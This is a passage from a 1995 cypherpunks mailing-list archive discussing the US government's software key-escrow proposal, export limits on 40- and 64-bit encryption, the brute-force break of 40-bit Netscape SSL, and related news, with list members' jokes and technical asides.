   compromise with American corporations on a software coding
   system that would protect the privacy of communication over
   computer networks while still permitting court-authorized
   wiretaps and eavesdropping by law enforcement officials.

   Critics of the Clipper Chip have opposed it because the
   Government refused to allow public examination of the
   underlying technology to make sure there were no secret
   backdoors that might allow unauthorized spying.
   Privacy-rights advocates attacked the policy because it
   called for a Government agency to hold a numeric key to
   each user's code. And technology executives have opposed
   the Government's data-scrambling policy because it
   restricts export of other types of data-security systems,
   which is seen as an impediment to sales of American
   computer products overseas.

   Officials of the Commerce Department's National Institute
   of Standards and Technology, which administers the data-
   scrambling standard, said yesterday that the Government
   would convene a workshop on Sept. 6 and 7 to discuss the
   new proposal. The topics include a proposal to relax the
   export policy and discussion of an alternative to Clipper
   technology that would be more palatable to industry
   executives.

   Industry officials had written two weeks ago to Vice
   President Al Gore, calling for resumption of talks that had
   broken off last year. In the talks last year industry
   leaders had met with Government officials to seek Clipper
   Chip alternatives.

   "I think that moving ahead with industry dialogue is
   positive," Robert W. Holleyman 2d, president of the
   Business Software Alliance, said yesterday. The alliance is
   a group of the industry's largest software companies,
   including Microsoft, Lotus and Novell. "But much more needs
   to be fleshed out," Mr. Holleyman said.

   One big criticism of the Clipper policy was the proviso
   that a Government agency would hold, in escrow, a decoding
   key that law-enforcement officials could obtain after
   receiving a court's authorization. The new proposal would
   still include a provision for holding keys in escrow, but
   Government officials said they were now willing to discuss
   letting non-Government escrow agents hold the keys.

   Later in September, the Government will hold a second
   workshop to discuss Federal standards for software coding
   systems that could then be used as an alternative to
   Clipper and a related technology called Capstone. In an
   attempt to establish Clipper and Capstone as de-facto
   industry standards, the original policy mandated that
   computer and communications systems sold to the Federal
   Government must contain Clipper or Capstone hardware.

   But the new approach might allow computer and
   communications companies to sell products to the Government
   that achieved the same privacy protection through software-
   only means. That would relieve companies doing business
   with the Government of the obligation to invest in Clipper
   and Capstone technologies that might not find buyers in the
   commercial marketplace.

   Another criticism of the Government's policy has been its
   longstanding export rules, which have put strict limits on
   the export of software containing data-encoding
   capabilities. The assumption has been that the Government's
   electronic spies, the National Security Agency, would be
   able to break codes with keys of 40 bits or shorter. But
   now the Government will consider allowing export of coding
   systems with keys up to 64 bits long -- on the condition
   that decoding keys be held in escrow for access by
   authorized law-enforcement officials.

   "This is definitely a compromise," said Ray Kammer, the
   deputy director of the National Institute of Standards and
   Technology. "During the past year we've had a pretty
   spirited debate about the possibility of a 64-bit software
   key-escrow system. Law enforcement people had to get used
   to the notion it might be possible to do this."

   The vulnerability of 40-bit systems was underscored two
   days ago. A French student decoded a message that had been
   encoded using the 40-bit security feature in the European
   version of the Netscape Communications Corporation software
   for navigating the Internet's World Wide Web service.

   The student, Damien Doligez, at Ecole Polytechnique, a
   French engineering and sciences college, used 120 computers
   in a campus network to simultaneously test every key
   possible in a short period. It took him eight days, but he
   was able to decode a single encoded Netscape message. Mr.
   Doligez announced his achievement on the Internet.

   Yesterday, Netscape issued a statement saying that the
   version of its software distributed in the United States
   supports 128-bit keys, which the company said would require
   more than one trillion times the computing power the French
   student used to decode the message.

   Despite the industry's tentative willingness to accept a
   key-escrow coding plan, civil liberties organizations and
   other computer experts said that escrow techniques made
   little sense in light of the fact that private individuals
   might use any kind of coding system they wished to exchange
   information domestically. Encoding systems without escrow
   keys are also widely available overseas.

   "How does key escrow accomplish what the Government has set
   out to do?" asked David Sobel, legal counsel for the
   Electronic Privacy Information Center, a Washington D.C.
   public interest group. "Nonescrowed encryption is out
   there," he said. "And for the concerns law and enforcement
   and intelligence have, the problem remains and it will
   remain under this policy."

   [End]













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 18 Aug 95 04:32:11 PDT
To: cypherpunks@toad.com
Subject: Re: Export policy change
Message-ID: <v02120d02ac5a26d62a7a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:12 AM 8/18/95, Timothy C. May wrote:

>My neighbor has agreed to be the escrow agent for my keys. He doesn't know
>anything about computers, so he's taking my word that the things I give him
>every couple of months are disks. He figures that if the Justice Department
>ever asks for them, he'll point to the dusty box on the floor of his garage
>and say, "There they be."

You wouldn't want them to get *dusty*, Tim. Why not embed them in something
like epoxy, better, Lexan, to protect them from the elements? Say about a
foot thick in all directions... Should make sure the media itself is
sufficiently coated too. Don't want the little electrons getting hurt, you
know...

I see a market opportunity here. Time to buy DuPont stock. I hear it's been
depressed lately.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Fri, 18 Aug 95 04:54:25 PDT
To: cypherpunks@toad.com
Subject: Exportable if Escrowed Changes Nothing!
Message-ID: <199508181152.HAA57449@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


C-punks:

This "change" that encryption software can be exported if the keys are
escrowed means nothing.  PGP still couldn't be exported, since it can
generate its own keys.  You can be sure that any program that generates
its own keys couldn't be exported.  How are you going to escrow 2^100
possible keys (or whatever it is that PGP can generate)?

Thus, this regulatory change means diddly-squat.  The only crypto that 
could be exported would be something like Clipper, and they already said
that could be exported.

Governments:  can't live with 'em, can't shoot 'em.

Regards,

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Fri, 18 Aug 95 05:00:32 PDT
To: tcmay@got.net>
Subject: Re: Non-News Govt Announcem
Message-ID: <n1403389714.2970@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


It seems more likely that the opposite will occur: Clinton has been pandering
for the police vote so strongly that he's more likely to come up with more
draconian proposals to curry their favor.

-d

--------------------------------------
Date: 8/17/95 11:47 PM
To: Dave Banisar
From: Timothy C. May
At 9:49 PM 8/17/95, Dave Banisar wrote:
>The White House and NIST announced today that they were planning to hold two
>open meetings next month to develop standards for "acceptable" software key
>escrow.  The standards will then be made into a FIPS. The programs cannot
>have keys larger than 64 bits.
>
>It's great to see that it only took them 18 months (since Feb. 94) to come
>up with a call for public meetings for something that nobody really wants
>anyway, except for the officials who plan to make it mandatory by slipping
>it through bit by bit and a couple of vendors.  (sorry, sarcasm mode
>off...)

One thing I'm hoping for is that Clinton will, as he contemplates his last
year and a bit in office, have an attack of "liberalism." That is, I am
hoping he realizes that any mandatory key escrow system is not only a
massive infringement on the right of people to speak and communicate as
they wish, it is also handing the keys to the Surveillance State to the
likes of Bob Dole, Jesse Helms, Alfonse D'Amato, Newt Gingrich, and William
Bennett.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."



------------------ RFC822 Header Follows ------------------
Received: by epic.org with SMTP;17 Aug 1995 23:40:49 U
Received: from [205.199.118.202] (tcmay.sensemedia.net [205.199.118.202]) by
buckeye.sensemedia.net (8.6.9/8.6.9) with SMTP id UAA05708; Thu, 17 Aug 1995
20:47:55 -0700
Date: Thu, 17 Aug 1995 20:47:55 -0700
X-Sender: tcmay@mail.got.net
Message-Id: <ac595a311502100481c2@[205.199.118.202]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Priority: 1 (Highest)
To: banisar@epic.org (Dave Banisar), cypherpunks@toad.com
From: tcmay@got.net (Timothy C. May)
Subject: Re: Non-News Govt Announcement on Key Escrow




_________________________________________________________________________
Subject: RE>>Non-News Govt Announcement on...
_________________________________________________________________________
David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301  * ftp/gopher/wais cpsr.org 
Washington, DC 20003                * HTTP://epic.digicash.com/epic




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 18 Aug 95 08:34:20 PDT
To: adam@bwh.harvard.edu (Adam Shostack)
Subject: Re: Netscape security
In-Reply-To: <9508181509.AA01916@joplin.harvard.edu>
Message-ID: <199508181529.IAA01360@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 	The certificates must be signed by an approved key signing
> agency.  Anyone can produce one; to get it to interact 'securely' with
> free netscape browsers you need the certificate to be signed.
> 
> 	There is no word as to how to become a KSA.  Netscape has
> ignored the question on several occasions.
> 

	It is interesting that in order for me to use the commerce
server on an *internal* application I am working on, my project
*still* needed to get the key signed by verisign, even though no one
outside of the company I am working for will have access to the
commerce server my application is running on.

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 18 Aug 95 05:34:06 PDT
To: jgrasty@gate.net
Subject: Re: Exportable if Escrowed Changes Nothing!
In-Reply-To: <199508181152.HAA57449@tequesta.gate.net>
Message-ID: <9508181232.AA06225@all.net>
MIME-Version: 1.0
Content-Type: text


> C-punks:
> 
> This "change" that encryption software can be exported if the keys are
> escrowed means nothing.  PGP still couldn't be exported, since it can
> generate its own keys.  You can be sure that any program that generates
> its own keys couldn't be exported.  How are you going to escrow 2^100
> possible keys (or whatever it is that PGP can generate)?

As I said, for $1 each, I will be happy to escrow all 2^100th keys
for 100 bit PGP.  Send your dollars to the address below:

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Gillman <syshtg@gsusgi2.Gsu.EDU>
Date: Fri, 18 Aug 95 05:35:52 PDT
To: cypherpunks@toad.com
Subject: Rant Generator
Message-ID: <199508181235.IAA10123@gsusgi2.Gsu.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Anybody have the URL of that rant generator that was mentioned here a 
couple of weeks ago? Due to unforeseen circumstances, all my annotations
got lost :(

Thanks,

-- 
 Tom Gillman, Unix/AIX Systems Weenie  |"For a privacy advocate to determine
 Wells Computer Center-Ga. State Univ. |the best way to do key escrow is like
 (404) 651-4503 syshtg@gsusgi2.gsu.edu |a death penalty opponent choosing
 I'm not allowed to have an opinion.   |between gas or electricity"-D.Banisar
                                    
  key to UNIX: echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D4D465452snlbxq'|dc



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 18 Aug 95 06:45:56 PDT
To: cypherpunks@toad.com
Subject: Re: Export policy change
Message-ID: <199508181352.IAA28188@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


>Ok, let's escrow our keys with Julf :-)
>
>Seriously, there might be a market for somebody to become a professional 
>escrow agent....
>
>(tongue partially in cheek)
>

I will cheerfully escrow keys for 1$ ecash/key. Please be advised, however,
that key storage will be on an old 40M RLL drive on an 8088 machine, so
retrieval may be a bit slow and unreliable.......

Yes, I'm really serious about the fee and storage medium.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Fri, 18 Aug 95 05:52:26 PDT
To: cypherpunks@toad.com
Subject: PRZ Wins One
Message-ID: <70510c2w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young <jya@pipeline.com> writes:

>    PRZ is awarded a 1995 Chrysler Award for Innovation in
>    Design, says a $40,000 full-page ad in The NYT today, with
>    a brief citation:
> 
>       Philip Zimmermann is the designer of Pretty Good Privacy
>       (PGP), an E-mail encryption software. Thanks to the
>       algorithms of PGP, which was released to the public as
>       free software in 1991, E-mail messages can be sent
>       securely all over the world without the risk of
>       interception by any third party.
> 
>    No mention of the free-world leader's sword poised to
>    decapitalize the public-spirited designer to protect IC
>    hegemony.

No need. The implied vote of support is quite clear.


--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Uszynski <pierre@shell.portal.com>
Date: Fri, 18 Aug 95 09:05:02 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <199508181603.JAA09123@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Jordan (jordan@Heuristicrat.COM) attempts to correct me ;-)

> >  From pierre@shell.portal.com Thu Aug 17 18:29:41 1995
> >
> >  Unfortunately, in this case, insecure credit cards are not an
> >  obstacle to banks making money, so why should they care?
>
> [...] if you think that the major card issuers "don't care" about
> cutting (or eliminating) fraud, you're not talking to the right
> people.  Fraud eats away a big chunk of revenue [...]

Creative quoting aside, the point of my post, if it needs further
clarification, was that the cost of fraud is not only a burden to
the banks as some people seem to think. It is not even only transmitted
back to the customers in the form of higher fees and interest rates.

Card issuers can, do, and should as long as they can get away with it,
rely on methods against fraud that are less costly to them. That's
because they answer to their bottom line, to their shareholders.
There are disincentives to fraud in the form of legal penalties and
threat of same, even the impression that credit cards are insecure may
help by limiting what (some) people dare to do with them. The costs of
these methods of fighting fraud are carried in part even by us who don't
even usually use credit cards! The higher the penalties and cost of
enforcement, the lower the direct burden on banks, but that does not
necessarily mean that our (users') bottom line will improve.

For citizens and taxpayers who are not significant shareholders, it's
not enough to ask the card issuers what the cost of card insecurity is
to them. "Our cost is higher."

By making some credit card fraud illegal, enforcing, etc... we actually
allow card issuers to use less secure mechanisms and procedures
(although I'll agree this does not apply to the 40 bit key nonsense,
that's one case where banks and businesses would be happy to use longer
keys.) (the equivalent mis-quote about politicians applies here :-)

Pierre.
pierre@shell.portal.com
(And I will not contribute further to this side thread.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harveyrj@vt.edu (R. J. Harvey)
Date: Fri, 18 Aug 95 07:11:45 PDT
To: cypherpunks@toad.com
Subject: Re:  Netscape security
Message-ID: <9508181411.AA11657@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On the subject of Netscape:
   Now that Netscape is making the Commerce Server available
for free to students, faculty, libraries, etc. (i.e., groups
with limited ability to cough-up $290 to RSA to get the 
1-year digitally-signed certificate needed to make it operate 
in "secure mode"), does anyone know of alternative methods for 
producing such certificates?  

rj
------------------------------------------------------
R. J. Harvey                 
                            email: harveyrj@vt.edu
WWW site for job analysis 
& personality research:     http://harvey.psyc.vt.edu/

PGP key at http://harvey.psyc.vt.edu/RJsPGPkey.txt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Fri, 18 Aug 95 07:26:45 PDT
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: NIST Release on Key Escrow
Message-ID: <n1403380943.31911@epic.org>
MIME-Version: 1.0
Content-Type: text/plain



EMBARGOED FOR RELEASE:                  NIST 95-24
3 p.m. EDT, Thursday, Aug. 17, 1995

Contact:  Anne Enright Shepherd         COMMERCE'S NIST ANNOUNCES
          (301) 975-4858                PROCESS FOR DIALOGUE ON
                                        KEY ESCROW ISSUES

     Furthering the Administration's commitment to defining a
workable key escrow encryption strategy that would satisfy
government and be acceptable to business and private users of
cryptography, the Commerce Department's National Institute of
Standards and Technology announced today renewed dialogue on key
escrow issues.

     A Sept. 6-7 workshop will convene industry and government
officials to discuss key escrow issues, including proposed
liberalization of export control procedures for key escrow
software products with key lengths up to 64 bits, which would
benefit software manufacturers interested in building secure
encryption products that can be used both domestically and
abroad.

     Key escrow encryption is part of the Administration's
initiative to promote the use of strong techniques to protect the
privacy of data and voice transmissions by companies, government
agencies and others without compromising the government's ability
to carry out lawful wiretaps.

     In a July 1994 letter to former Rep. Maria Cantwell, Vice
President Gore said that the government would work on developing
exportable key escrow encryption systems that would allow escrow
agents outside the government, not rely on classified algorithms,
be implementable in hardware or software, and meet the needs of
industry as well as law enforcement and national security.  Since
that time, discussions with industry have provided valuable
guidance to the Administration in the development of this policy.
For example, many companies are interested in using a corporate
key escrow system to ensure reliable back-up access to encrypted
information, and the renewed commitment should foster the
development of such services.

     Consideration of additional implementations of key escrow
comes in response to concerns expressed by software industry
representatives that the Administration's key escrow policies did
not provide for a software implementation of key escrow and in
light of the needs of federal agencies for commercial encryption
products in hardware and software to protect unclassified
information on computer and data networks.

     Officials also announced a second workshop at which industry
is invited to help develop additional Federal Information
Processing Standards for key escrow encryption, specifically to
include software implementations.  This standards activity would
provide federal government agencies with wider choices among
approved key escrow encryption products using either hardware or
software.  Federal Information Processing Standards provide
guidance to agencies of the federal government in their
procurement and use of computer systems and equipment.

     Industry representatives and others interested in joining
this standards-development effort are invited to a key escrow
standards exploratory workshop on Sept. 15 in Gaithersburg, Md.
This workshop is an outgrowth of last year's meetings in which
government and industry officials discussed possible technical
approaches to software key escrow encryption.

     The Escrowed Encryption Standard, a Federal Information
Processing Standard for use by federal agencies and available for
use by others, specifies use of a Key Escrow chip (once referred
to as "Clipper chip") to provide strong encryption protection for
sensitive but unclassified voice, fax and modem communications
over telephone lines.  Currently, this hardware-based standard is
the only FIPS-approved key escrow technique.  NIST officials
anticipate proposing a revision to the Escrowed Encryption
Standard to allow it to cover electronic data transmitted over
computer networks.  Under this revised federal standard, the
Capstone chip and other hardware-based key escrow techniques
developed for use in protecting such electronic data also will be
approved for use by federal agencies.

     As a non-regulatory agency of the Commerce Department's
Technology Administration, NIST promotes U.S. economic growth by
working with industry to develop and apply technology,
measurements and standards.

                                 - 30 -

Note to editors:  Readers who are interested in obtaining more
information about the workshops can contact Arlene Carlton,
(301) 975-3240, fax: (301) 948-1784, e-mail: carlton@micf.nist.gov.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 18 Aug 95 07:21:47 PDT
To: cypherpunks@toad.com
Subject: BUK_guv
Message-ID: <199508181421.KAA22725@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-18-95. W$Japer:


   "Encryption-Software Plan Presented Using 'Keys' Held by
   Escrow Agents." [This is a variation on the Markoff article
   today, with a bit more.]

      Companies hoping to start selling stronger encryption
      products will have to wait a few months, since the
      administration has yet to sort out important details.
      For instance, one unresolved issue is how to certify
      escrow agents to keep fly-by-night operators and
      organized-crime figures out of the business. And the
      administration's emerging policy doesn't deal with
      data-security hardware -- products that wire the
      encryption schemes right into chips or other devices.
      Even with the export restrictions, U.S. officials
      haven't been able to stop widespread international
      distribution of an encryption program, called Pretty
      Good Privacy, that is nearly impossible to crack.


   "Seizure of Electronic Messages In Obscenity Case Raises
   Questions."

      Users of a small computer bulletin board in Ohio sued
      local authorities who seized their electronic mail and
      other materials as part of an investigation into obscene
      postings. In their lawsuit, which appears to be the
      first of its kind, the plaintiffs contend that the
      Hamilton County Regional Computer Crimes Task Force and
      other authorities violated their rights to free speech
      and privacy by seizing their messages during a June raid
      of five bulletin boards. The plaintiffs also allege
      that, by seizing their private electronic messages, the
      authorities violated the Electronic Communications
      Privacy Act.


   Double yolk: BUK_guv (about 11kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 18 Aug 95 07:23:45 PDT
To: cypherpunks@toad.com
Subject: 28M_dip
Message-ID: <199508181423.KAA23006@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-17-95. FPeach:


   "Russian 'in $2.8m Citibank computer fraud'."

      Citibank New York fell victim to a $2.8m fraud after a
      Russian computer hacker penetrated the bank's security
      system in Wall Street and removed the money from the
      accounts of corporate clients, it was claimed in a
      London court yesterday. The alleged fraud was carried
      out by a 24 year-old mathematics graduate using a
      computer in his office in St Petersburg, claim the US
      authorities, which are seeking his extradition from the
      UK.


   8-17-95. NYPaper:

   "Russian Accused of Citibank Computer Fraud."

      A judge set another hearing for Sept. 15 after Mr.
      Levin's lawyer argued that the Government has not shown
      that any computer in the United States was involved.



   Stereo: 28M_dip (about 6kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Fri, 18 Aug 95 08:29:19 PDT
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Export policy change
In-Reply-To: <199508181352.IAA28188@arnet.arn.net>
Message-ID: <Pine.BSI.3.91.950818102219.6463B-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 18 Aug 1995, David K. Merriman wrote:

> >Ok, let's escrow our keys with Julf :-)
> >
> >Seriously, there might be a market for somebody to become a professional 
> >escrow agent....
> >
> >(tongue partially in cheek)
> >
> 
> I will cheerfully escrow keys for 1$ ecash/key. Please be advised, however,
> that key storage will be on an old 40M RLL drive on an 8088 machine, so
> retrieval may be a bit slow and unreliable.......


Same here -- I have an original Compaq "Sewing Machine" Portable with 
a 40MB hard card.  Of course the HD sticks and needs a good whacking
sometimes, and the last floppy came out of the drive smoking and
covered in grease.  (You DO have a 5 1/4" 360K floppy don't you?)

My service, however, is $2.  That's because all keys are encrypted against
my key, which is unfortunately escrowed with the fellow listed above.

Sorry about having to pass along the extra costs. :-)


David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant. "...you have a personal responsibility 
to be pro-active in the defense of your own civil liberties." - S. McCandlish





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Fri, 18 Aug 95 10:34:33 PDT
To: cypherpunks@toad.com
Subject: Distributed computing
In-Reply-To: <14470.9508181605@exe.dcs.exeter.ac.uk>
Message-ID: <199508181734.KAA03684@emily6.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


This may be more of a computer science question than a cryptography
one, but it seems relevant to the current discussion:

What is the current technology for running large compute-intensive
jobs across a whole lotta computers?  Specifically, what's the best
way to run something like a big key-cracking job on a farm of
workstations?  Run separate jobs on each machine that check in to a
main server for new keys to crack?  Or is there a better way?

Also, on the note of producing a cheap parallel setup: a simple 90MHz
pentium motherboard is ~$150.  A cheap network card is under $50, and
I'll bet it's possible to build a custom power-supply that'll juice a
whole bunch of motherboards for under $200.  You don't need monitors
or keyboards for these machines -- just one of each to plug into the
various machines to troubleshoot. Thus, the incremental cost of adding
another pentium to a big cracking job is about $200 -- the startup
cost is the cost of the distributed power supply, monitor, keyboard,
etc. plus one server.  And it's even cheaper to build this sort of
setup if you go to someone who knows what s/he is doing, and can put a
whole lotta CPUs onto one motherboard...

The point is, that while one pentium can't do a whole lot, it's pretty
cheap to build a DIY pentium "farm."  And if a whole lot of people
have these farms, and are willing to run distributed cracking jobs on
them, computing power like that of the systems used in the RC40 crack
is very easy to come by.

Finally, there is a factor that hasn't been touched on much yet.
Credit cards are not the crux of the problem: in the years to come,
there will be more and more ways to manipulate money on the net.
Charles Schwab is already working on a way to trade stocks wholesale
over the net (or have they already started?), and I know of a couple
other companies that have plans in the works to do the same.  If it's
possible for a small group to break one of *these* keys in a
relatively short time (a month or two, I suppose), the money at stake
could be well worth the compute time involved.


- -sq

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMDTPE1IP+Y8TPTdtAQGf3wP/f+X6nCvFqnqtdjUv4JqV3AMZVTXaf1At
TCvP8DByrbRH/Yo/1PQvtOkLIcmII1meI0FQjLRsE13EL5KNZoppyAkcCTl5Rr92
bsrHZsZLI3cYry9YZP/m1XthrrZg5ppePIbfOiUzqoCYHCUvqlhJyTRl00Y4lZP4
+mLYuDh1Rps=
=+Tij
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dorab Patel <dorab@twinsun.com>
Date: Fri, 18 Aug 95 10:54:34 PDT
To: cypherpunks@toad.com
Subject: PGP encryption for HTML forms
Message-ID: <199508181754.KAA05661@knee.twinsun.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I've developed a simple protocol for encrypting the submission of HTML
forms using PGP.  I've written up the protocol in an "Internet Draft".
We are distributing two reference implementations (with sources ---
copyrighted, but freely redistributable).  One is a modification to
lynx sources to handle this protocol natively.  The other is a "helper
application" (by Jun Hamano) to do the encryption written in python.
You can get the package via anon ftp.

	ftp://ftp.cs.ucla.edu/pub/sitp.tar.gz

Comments welcome.

Snarf it before it becomes illegal!


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface

iQCVAwUBMDTTYGnoQvE1ROndAQE5dQP/SWII7eR/eFYWsdU6mOilLZautmtS1rb9
kRcifS02p7WS3N3sY+MRu20uuPmuL+f+5rriYWJWVgd//s3jgegs8HGqmRuxVQdL
qMFRmtMB5oUfYkLmTiDebHsksr2YLF+AB8vrBCgXIbgKAcSRF4OStRyXBUeXfZ/3
gp9MiACvXV4=
=PxCp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 18 Aug 95 09:01:32 PDT
To: David Neal <dneal@usis.com>
Subject: Re: Export policy change
Message-ID: <199508181608.LAA29884@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:25 AM 8/18/95 -0500, you wrote:
>On Fri, 18 Aug 1995, David K. Merriman wrote:
>
>> >Ok, let's escrow our keys with Julf :-)
>> >
>> >Seriously, there might be a market for somebody to become a professional 
>> >escrow agent....
>> >
>> >(tongue partially in cheek)
>> >
>> 
>> I will cheerfully escrow keys for 1$ ecash/key. Please be advised, however,
>> that key storage will be on an old 40M RLL drive on an 8088 machine, so
>> retrieval may be a bit slow and unreliable.......
>
>
>Same here -- I have an original Compaq "Sewing Machine" Portable with 
>a 40MB hard card.  Of course the HD sticks and needs a good whacking
>sometimes, and the last floppy came out of the drive smoking and
>covered in grease.  (You DO have a 5 1/4" 360K floppy don't you?)

Yeah - it's my 'good' fdd. The other one is a 180K :-)

Dave
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Fri, 18 Aug 95 08:04:58 PDT
To: perry@piermont.com
Subject: Re: use PGP for http encryption instead!
In-Reply-To: <199508180329.XAA00456@frankenstein.piermont.com>
Message-ID: <9508181458.AA01838@joplin.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| "George P. Magiros" writes:
| > i don't mean to be extremely brash, but couldn't one use PGP to provide
| > encrypted communication with the web.
| 
| You ought to read up on S-HTTP, the expert on said protocol being our
| very own Eric Rescorla...

	PGP support was taken out of the latest SHTTP draft,
apparently because no one had implemented it.  Should someone build a
libSHTTP with PGP support, I suspect it would get back into the spec.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Fri, 18 Aug 95 08:17:33 PDT
To: Damien.Doligez@inria.fr (Damien Doligez)
Subject: Re: Cost to Crack Keys
In-Reply-To: <9508181407.AA07951@couchey.inria.fr>
Message-ID: <199508181501.PAA00845@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

